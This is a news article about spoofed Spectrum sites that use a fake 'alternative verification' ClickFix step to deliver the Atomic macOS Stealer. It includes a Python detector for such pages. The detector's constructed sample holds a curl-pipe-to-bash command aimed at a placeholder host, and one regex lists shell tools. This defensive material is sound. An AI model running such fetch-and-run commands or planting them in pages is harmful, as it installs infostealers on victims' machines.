- CloudSEK researchers find a spoofed version of the Spectrum website
- The site tricks people into running malware through the ClickFix method
- The researchers attributed the attack to a Russian-speaking group
Russian threat actors have been seen using the popular ClickFix method to steal passwords and deploy infostealer malware on macOS targets.
CloudSEK security researchers have reported multiple spoofed websites imitating Spectrum, a telecommunications provider based in the United States. Victims who visit these sites are first asked to verify that they are human; however, the “verification” is designed to “fail”, after which victims are asked to use an “alternative verification”.
It is not clear why the attackers added this extra step; we can assume it is meant to confuse victims and lower their guard.
In any case, the “alternative verification” method copies a command to the victim's clipboard, after which victims are instructed to paste and execute it on their devices.
The command delivers Atomic macOS Stealer (AMOS), an infamous macOS infostealer that harvests passwords, cryptocurrency wallet data and system information from macOS users.
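As an added illustration, not code from CloudSEK's report or from the campaign itself, the following Python heuristic flags pages that combine a "verification" lure with a clipboard-copied shell command, the core of the ClickFix flow described above. Both HTML snippets are constructed samples and the domain is a placeholder.

```python
import re

# Constructed sample pages for exercising the detector (not taken from the real campaign).
BENIGN_PAGE = """
<button onclick="navigator.clipboard.writeText('SAVE20')">Copy coupon</button>
"""
SUSPICIOUS_PAGE = """
<div id="alt-verify">Verification failed. Use alternative verification:</div>
<script>
  // Copies a terminal command to the clipboard and tells the visitor to run it
  document.getElementById('alt-verify').onclick = function () {
    navigator.clipboard.writeText("curl -fsSL https://example.invalid/check | bash");
  };
</script>
"""

# Literal string handed to navigator.clipboard.writeText(...)
CLIPBOARD_WRITE = re.compile(
    r"""navigator\.clipboard\.writeText\(\s*(['"`])(.*?)\1\s*\)""", re.S)
# Tokens that make a clipboard payload look like a shell command rather than text
SHELL_MARKERS = re.compile(
    r"\b(curl|wget|bash|sh|zsh|osascript|base64|xattr|sudo)\b|\|\s*(ba)?sh\b")
# Social-engineering lure vocabulary seen in ClickFix-style pages
LURE_WORDS = re.compile(r"verif|captcha|human", re.I)


def find_clickfix_indicators(html: str) -> list[dict]:
    """Return one finding per clipboard write, marking shell-like payloads on lure pages."""
    lure = bool(LURE_WORDS.search(html))
    findings = []
    for match in CLIPBOARD_WRITE.finditer(html):
        payload = match.group(2)
        shell_like = bool(SHELL_MARKERS.search(payload))
        findings.append({
            "payload": payload,
            "shell_like": shell_like,
            "lure_text": lure,
            "suspicious": shell_like and lure,
        })
    return findings


def is_clickfix_page(html: str) -> bool:
    """True when at least one clipboard write on the page is flagged as suspicious."""
    return any(f["suspicious"] for f in find_clickfix_indicators(html))
```

Regex matching only catches plaintext payloads; obfuscated or dynamically built strings need a browser-instrumented check of the clipboard API instead.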
CloudSEK did not attribute the campaign to any particular threat actor, but has determined that it is of Russian origin.
“When inspecting the source code of the delivery page, we found a couple of comments in Russian, indicating that the malware is probably being spread by Russian-speaking cybercriminals,” the company said.
The campaign does not appear to target a specific group of people or companies, but since it spoofs Spectrum, it is safe to say the victims are current or potential customers of the company.
The experts noted that the campaign was put together rather clumsily: “The poorly implemented logic in the delivery sites, such as instructions not matching across platforms, points to hastily assembled infrastructure. This campaign highlights a growing trend in multi-platform social engineering attacks aimed at consumer and corporate users,” CloudSEK concluded.
ClickFix has become quite popular recently, with different security outfits reporting that they have discovered different variants of the technique in the wild.
Via The Hacker News